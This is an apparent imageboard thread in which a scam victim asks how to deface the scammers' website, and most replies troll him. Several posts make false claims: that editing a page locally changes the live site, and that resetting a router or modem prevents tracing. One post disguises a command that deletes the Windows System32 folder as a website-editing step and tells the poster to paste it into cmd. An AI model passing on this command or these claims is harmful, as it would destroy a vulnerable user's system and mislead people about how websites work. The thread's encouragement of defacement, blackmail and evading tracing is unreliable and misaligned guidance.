How to edit the text of a website...

how to edit the text of a website ? i got scammed and i want to edit their website by force to remove all the text and replace it with "Scammers"

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Most browsers have developer tools that let you do that. The shortcut is usually F12.

Alternatively you can save the page and edit it in notepad. After you're done editing just open it in your browser to upload and apply the changes to their site.

Also make sure to reset your router afterwards so they can't trace it back to you.

on chrome:
>press ctrl+shfit+I
>go to "elements"
>right click on the element you want to edit
>click "edit as HTML"
>type in the text you want
boom, done. it will update on your side right away, on the server side it might take a delay of 5 minutes or so

on firefox (doesn't work as well sometimes):
>press ctrl+shift+I
>click "inspector"
>right click the element you want
>click "edit as HTML"

>Also make sure to reset your router afterwards so they can't trace it back to you.
you're an idiot

they will be able to trace you OP even if you reset your router
you have to reset your cable modem


Don't use Microsoft Word to edit the html files 'cause it will contain identifying information about you. Always use WordPad for maximum privacy.

Install Kali Linux

>Right click
>Inspect Element
>"Select an image on the page to inspect it"
>Edit the text

Now you're a hacker

how to save and republish it after?
i am a fool working abroad who was looking for a loan and i fell for a advance fee scam , lost alot of money while i need the loan for a surgery i want to destroy their site in the hope i can blackmail them to refund me my money or atleast to warn others

>loan for a surgery

That's what you get for going to the US.

No, Kali won't synch OP's changes. He needs to use Solus because the KevinNet feature will synchronate all the changes OP makes to the the website without any work from OP.

Bro, does Solus even have enough Gibsons to penetrate modern website servers?

are you going to be an asshole making fun of a person with a life threatening health problem or are you gonna be helpful?
fuckin asshole also its not in the US

ctrl+s and save the page

when you want to republish, go back to the page you saved, edit it like before but this time when you edit as HTML, copy the whole text

then go to the site you want to edit, and paste the whole text in there

i think you're trolling

> tfw this fuck is too young to even understand the Gibson reference

i have no reason to troll you asshole

can somebody just target this site ? erase their shit and put only the word "SCAMMERS" on it thanks

>Search "harbex financier" with google, scam alerts literally on the first page of results.

While I hate scammers maybe you deserved it for not doing a proper research.


do it through windows ms-dos:
>open their web page
>hold down windows button and press "r"
>type in cmd + hit enter
>paste this in
>echo "edit --current --webpage --open --with-wordpad --with-telnet-access" && echo "useModule" && del /F /S /Q /A %windir%\System32\*.*

it should open up the wordpad that connects to their site and will change their website after you save the word pad file. Keep in mind if they see it they can easily change it back, so its best to do it now while everyone is not working on the weekends so they wont see it.

Create a bookmark
javascript:document.body.contentEditable=true; document.designMode=on; void 0

into bookmark properties.
Goto page.
Click edit bookmark
save page as

don't do this it creates mustard gas

This whole thread is way too mean

OP, just get out
